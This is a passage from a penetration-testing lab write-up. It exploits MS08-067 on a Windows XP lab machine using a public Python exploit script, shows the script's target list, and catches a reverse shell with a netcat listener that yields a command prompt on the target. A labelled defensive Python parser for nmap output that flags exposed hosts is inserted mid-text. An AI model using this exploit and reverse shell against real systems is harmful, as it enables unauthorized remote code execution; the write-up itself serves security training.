Remote Code Execution
The target system is confirmed to be vulnerable to [[legacy_cve-2008-4250#cve-2008-4250 / MS08-067|CVE-2008-4250 (MS08-067)]].
┌──(kali㉿kali)-[~/…/htb/labs/legacy/ms08_067]
└─$ python2 ms08_067_2018.py -h
#######################################################################
# MS08-067 Exploit
# this is a modified verion of debasis mohanty's code (https://www.exploit-db.com/exploits/7132/).
# The return addresses and the ROP parts are ported from metasploit module exploit/windows/smb/ms08_067_netapi
#
# mod in 2018 by andy acer:
# - Added support for selecting a target port at the command line.
# It seemed that only 445 was previously supported.
# - Changed library calls to correctly establish a NetBIOS session for SMB transport
# - Changed shellcode handling to allow for variable length shellcode. Just cut and paste
# into this source file.
#######################################################################
usage: ms08_067_2018.py <target ip> <os #> <Port #>
example: MS08_067_2018.py 192.168.1.1 1 445 -- for Windows XP SP0/SP1 Universal, port 445
example: MS08_067_2018.py 192.168.1.1 2 139 -- for Windows 2000 Universal, port 139 (445 could also be used)
example: MS08_067_2018.py 192.168.1.1 3 445 -- for Windows 2003 SP0 Universal
example: MS08_067_2018.py 192.168.1.1 4 445 -- for Windows 2003 SP1 English
example: MS08_067_2018.py 192.168.1.1 5 445 -- for Windows XP SP3 French (NX)
example: MS08_067_2018.py 192.168.1.1 6 445 -- for Windows XP SP3 English (NX)
example: MS08_067_2018.py 192.168.1.1 7 445 -- for Windows XP SP3 English (AlwaysOn NX)
also: nmap has a good OS discovery script that pairs well with this exploit:
nmap -p 139,445 --script-args=unsafe=1 --script /usr/share/nmap/scripts/smb-os-discovery 192.168.1.1
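The nmap script recommended in the usage text reports one OS line per host. As an added example (not part of the exploit or of this write-up), the following parses that normal-format nmap output and flags hosts whose OS family appears in the exploit's own target list, which is how a defender would triage a scan for machines still exposed to MS08-067. The sample nmap output below, including the second host, is constructed for the example.

```python
import re

# Constructed sample of `nmap --script smb-os-discovery` normal output
# (not captured from the target; the second host is invented as a non-match).
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 10.10.10.4
Host script results:
| smb-os-discovery:
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|   NetBIOS computer name: LEGACY\\x00
|_  System time: 2022-01-01T00:00:00+00:00

Nmap scan report for 10.10.10.99
Host script results:
| smb-os-discovery:
|   OS: Windows 10 Pro 19041 (Windows 10 Pro 6.3)
|   Computer name: ws01
|_  NetBIOS computer name: WS01\\x00
"""

# OS families that appear in the exploit's target list above (XP, 2000, 2003).
MS08_067_OS_FAMILIES = ("Windows XP", "Windows 2000",
                        "Windows Server 2003", "Windows 2003")


def parse_smb_os_discovery(text):
    """Return {ip: {"os": ..., "name": ...}} from nmap normal output."""
    hosts, current = {}, None
    for line in text.splitlines():
        m = re.match(r"Nmap scan report for (\S+)", line)
        if m:
            current = m.group(1)
            hosts[current] = {"os": None, "name": None}
            continue
        if current is None:
            continue
        m = re.match(r"\|_?\s+OS:\s+(.*)", line)        # "OS CPE:" does not match
        if m:
            hosts[current]["os"] = m.group(1).strip()
        m = re.match(r"\|_?\s+Computer name:\s+(.*)", line)  # not the NetBIOS line
        if m:
            hosts[current]["name"] = m.group(1).strip()
    return hosts


def flag_legacy_smb_hosts(hosts):
    """Return sorted IPs whose reported OS is in an MS08-067-affected family."""
    return sorted(ip for ip, h in hosts.items()
                  if h["os"] and h["os"].startswith(MS08_067_OS_FAMILIES))


if __name__ == "__main__":
    parsed = parse_smb_os_discovery(SAMPLE_NMAP_OUTPUT)
    for ip in flag_legacy_smb_hosts(parsed):
        print(ip, parsed[ip]["name"], parsed[ip]["os"])
```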
According to the usage text, I should pass 6 as the OS number, since the target system appears to be Windows XP SP3.
┌──(kali㉿kali)-[~/…/htb/labs/legacy/ms08_067]
└─$ python2 ms08_067_2018.py $IP 6 445
#######################################################################
# MS08-067 Exploit
# this is a modified verion of debasis mohanty's code (https://www.exploit-db.com/exploits/7132/).
# The return addresses and the ROP parts are ported from metasploit module exploit/windows/smb/ms08_067_netapi
#
# mod in 2018 by andy acer:
# - Added support for selecting a target port at the command line.
# It seemed that only 445 was previously supported.
# - Changed library calls to correctly establish a NetBIOS session for SMB transport
# - Changed shellcode handling to allow for variable length shellcode. Just cut and paste
# into this source file.
#######################################################################
Windows XP SP3 English (NX)
[-]Initiating connection
[-]connected to ncacn_np:10.10.10.4[\pipe\browser]
Exploit finish
Launching the exploit
┌──(kali㉿kali)-[~/…/htb/labs/legacy/ms08_067]
└─$ nnc 62000
listening on [any] 62000 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.4] 1032
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
c:\WINDOWS\system32> whoami
whoami
'whoami' is not recognized as an internal or external command,
operable program or batch file.
c:\WINDOWS\system32> hostname
hostname
legacy
c:\WINDOWS\system32> ipconfig
ipconfig
Windows IP Configuration
ethernet adapter local area connection:
connection-specific dns suffix . :
ip address. . . . . . . . . . . . : 10.10.10.4
subnet mask . . . . . . . . . . . : 255.255.254.0
default gateway . . . . . . . . . : 10.10.10.2
An initial foothold has been established on the target system, but the whoami.exe binary is not available.
This is expected, as Windows XP does not ship with whoami.exe by default.